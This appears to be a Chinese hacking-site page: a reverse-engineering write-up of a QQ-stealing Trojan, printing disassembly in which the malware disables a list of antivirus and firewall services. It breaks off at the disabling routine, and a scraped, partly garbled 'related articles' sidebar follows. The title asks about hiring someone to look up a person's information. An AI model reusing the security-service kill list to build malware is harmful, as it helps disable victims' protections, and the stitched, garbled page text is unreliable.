找个 *** 要多少钱(查一个人的信息需要多
啊拉 *** 大盗有几个部分,大家看一下他的功能: 运行后关闭 *** ,安装后删除自身,过滤重复号码,彻底坠毁防火墙等等.其中我最感兴趣的还是看看啊拉 *** 大盗是怎么坠毁防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳 *** ,所以叫冷 *** 生帮我脱了.废话少说,下面是反汇编代码: Copy code .shrink:0040A0AA mov eax, offset s_Rsccenter ; "RsCCenter" .shrink:0040A0AF call sub_4095FC ;干掉如下防火墙服务.. .shrink:0040A0AF .shrink:0040A0B4 mov eax, offset s_Kvsrvxp ; "KVSrvXP" .shrink:0040A0B9 call sub_4095FC .shrink:0040A0B9 .shrink:0040A0BE mov eax, offset s_Kavsvc ; "kavsvc" .shrink:0040A0C3 call sub_4095FC .shrink:0040A0C3 .shrink:0040A0C8 mov eax, offset s_Kpfwsvc ; "KPfwSvc" .shrink:0040A0CD call sub_4095FC .shrink:0040A0CD .shrink:0040A0D2 mov eax, offset s_Kwatchsvc ; "KWatchSvc" .shrink:0040A0D7 call sub_4095FC .shrink:0040A0D7 .shrink:0040A0DC mov eax, offset s_Wscsvc ; "wscsvc" .shrink:0040A0E1 call sub_4095FC .shrink:0040A0E1 .shrink:0040A0E6 mov eax, offset s_Sndsrvc ; "SNDSrvc" .shrink:0040A0EB call sub_4095FC .shrink:0040A0EB .shrink:0040A0F0 mov eax, offset s_Ccproxy ; "ccProxy" .shrink:0040A0F5 call sub_4095FC .shrink:0040A0F5 .shrink:0040A0FA mov eax, offset s_Ccevtmgr ; "ccEvtMgr" .shrink:0040A0FF call sub_4095FC .shrink:0040A0FF .shrink:0040A104 mov eax, offset s_Ccsetmgr ; "ccSetMgr" .shrink:0040A109 call sub_4095FC .shrink:0040A109 .shrink:0040A10E mov eax, offset s_Spbbcsvc ; "SPBBCSvc" .shrink:0040A113 call sub_4095FC .shrink:0040A113 .shrink:0040A118 mov eax, offset s_SymantecCoreL ; "Symantec Core LC" .shrink:0040A11D call sub_4095FC .shrink:0040A11D .shrink:0040A122 mov eax, offset s_Navapsvc ; "navapsvc" .shrink:0040A127 call sub_4095FC .shrink:0040A127 .shrink:0040A12C mov eax, offset s_Npfmntor ; "NPFMntor" .shrink:0040A131 call sub_4095FC .shrink:0040A131 .shrink:0040A136 mov eax, offset s_Mskservice ; "MskService" .shrink:0040A13B call sub_4095FC .shrink:0040A13B .shrink:0040A140 mov eax, offset s_Mctaskmanager ; "McTaskManager" .shrink:0040A145 call sub_4095FC .shrink:0040A145 .shrink:0040A14A mov eax, offset s_Mcshield ; "McShield" .shrink:0040A14F call sub_4095FC .shrink:0040A14F .shrink:0040A154 mov eax, offset s_Mcafeeframewo ; "McAfeeFramework" .shrink:0040A159 call sub_4095FC .shrink:0040A159 .shrink:0040A15E .shrink:0040A15E loc_40A15E: ; CODE XREF: .shrink:0040A16D j .shrink:0040A15E call sub_409064 .shrink:0040A15E .shrink:0040A163 push 0BB8h .shrink:0040A168 call Sleep ;休眠 .shrink:0040A168 .shrink:0040A16D jmp short loc_40A15E .shrink:0040A16D 很明显,通过一个参数传递给sub_4095FC这个分支,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样构造:char sub_4095FC(int buffer)(C语言语法)把这个名称传递给sub_4095FC干什么捏?大家请看sub_4095FC这个分支: Copy code .shrink:004095FC sub_4095FC proc near
相关文章
女王们,职场是不分性别的
不知从何起,38妇女节酿成了女王节。或许是因为,女性在职场越来越有率领力了。她们变得更独立自信,也越发「难解姑娘心」。 钉钉本年的女王节告白,坐落在杭州学院路地铁站。 在地铁通道里,在这幅长图里,有...
渗透网站(渗透网站是什么意思)
本文导读目录: 1、网站渗透入侵全部教程 2、什么是网络渗透 3、怎么渗透网站啊 4、渗透最好的方法 5、Web渗透是怎么弄的? 网站渗透入侵全部教程 新手先学法律知识,知道哪些行为...
雄安新区实施居住北朝鲜现状证和积分落户制度
中新社雄安1月2日电 日前,河北雄安新区管理委员会正式印发《河北雄安新区居住证实施办法(试行)》和《河北雄安新区积分落户办法(试行)》(以下简称“两个办法”),自2021年起在雄安新区试行居住证和...
小路考注意事项?小路考什么
驾照考试中,科目二当选最难科目,而小路考又是科目二中较难的几个项目。许多考试都是在小路考上出错了才导致挂科的。实际上,掌握小路考的技巧能提高小路考的通过率。小路考有什么技巧呢?有什么口诀能够更好的记住...
深圳彩票黑客案真相(黑客爆中国彩票造假)
本文导读目录: 1、深圳福彩案的最大悬疑(关于8月12日《今日说法》) 2、深圳彩票诈骗 3、年度没品新闻,30条中有几条是真的 4、深圳福彩中心黑客案,我知道?! 5、在中国买彩票中...
电影黑客帝国下载1080p(黑客帝国 1080)
本文目录一览: 1、黑客帝国1~3高清迅雷下载 2、求所有黑客帝国系列的电影的下载地址 3、电影 黑客帝国全集下载,要带字幕 4、黑客帝国2:重装上阵高清完整版下载 黑客帝国1~3高清迅...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!